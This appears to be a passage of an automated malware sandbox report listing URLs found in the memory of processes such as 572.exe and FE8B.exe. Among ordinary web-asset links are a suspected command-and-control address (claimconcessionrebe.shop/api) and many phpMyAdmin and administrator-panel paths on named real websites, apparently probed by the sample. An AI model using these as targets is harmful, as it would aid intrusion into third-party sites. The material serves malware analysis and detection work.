                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/b4d1e3612e9417c6f9ec94f2/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/c9e559d574aa4985565e6710/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/store/home/store_home_share.jpg
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/store/home/store_index_promo.jpg
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.contentful.com/spaces/kp51zybwznx4/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                Source: 572.exe, 00000009.00000003.4299205287.0000000040630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/css/error.css
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-SemiBold.woff
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-SemiBoldItalic.woff
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/js/error.js
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.solvvy.com/deflect/customization/zoom/lazy-solvvy.js
                Source: 572.exe, 00000009.00000003.4288860252.0000000063FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainmine.io/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainmine.io/phpmyadmin/0C;
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chat-gold.sc-corp.net;
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/;
                Source: 572.exe, 00000009.00000003.4196885790.0000000047B06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040426000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298617897.0000000040427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/detail/bigefpfhnfcobdlfbedofhhaibnlghod
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/detail/kgjfgplpablkjnlkjmjdecgdpfankdle
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/phpmyadmin/H
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjdropshipping.com/phpmyadmin/s
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimconcessionrebe.shop/
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimconcessionrebe.shop/api
                Source: FE8B.exe, 00000007.00000003.2429068251.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimconcessionrebe.shop/apiT
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-api.arkoselabs.com/;
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/h
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/net7
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloud.simplify3d.com/phpmyadmin/pd
                Source: 572.exe, 00000009.00000003.4298617897.0000000040427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cms2.mega.nz/b41537c0eae056cfe5ab05902fca322b.png
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cn.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4288860252.0000000063FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.3.1.slim.min.js
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.zoom.com
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.zoom.com/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.appen.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.appen.com/phpmyadmin/2
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.12&appId=269882119846307&autoLogAppEven
                Source: 572.exe, 00000009.00000003.4337138614.000000004DB70000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp-reporting.cloudflare.com/cdn-cgi/script_monitor/report?m=2_zS2z5q4IP7tdk7qutJxWjpICOi2ek
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                Source: 572.exe, 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cz.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://de.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.zoom.us/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.zoom.us/docs/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devforum.zoom.us/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devsupport.zoom.us/hc/en-us
                Source: 572.exe, 00000009.00000003.4307098588.0000000006240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/gc6bj3Y
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dk.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4306089773.000000004E73A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duanxin.baidu.com
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/phpmyadmin/2
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easygold.joyalukkas.com/phpmyadmin/Oz
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ee.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4464339832.000000004D829000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/phpmyadmin//$z
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eei.uniandes.edu.co/phpmyadmin/q
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://embed.tawk.to/5d39786f6d8083122839f511/default
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enterprise.snap.com;
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://es.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://etd.lib.tuke.sk/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://etd.lib.tuke.sk/phpmyadmin/s.google.com21e
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ev.zoom.us/
                Source: explorer.exe, 00000002.00000000.2127512556.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.u
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/docs/en-us/developer-support-plans.html
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/about/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/acceptable-use-guidelines/
                Source: 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/accessibility
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/accessibility/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/av-facilities/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/audiences/cx/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/meetings/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/online-whiteboard/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/single-session-events/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/video-recording/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/webinars/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/workspace/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/zoom-phone/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/zoom-rooms/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/zoom-rooms/room-connector/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/resource-library/
                Source: 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/search/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/support-plans/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/team/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/terms/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/trust/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/trust/legal-compliance/
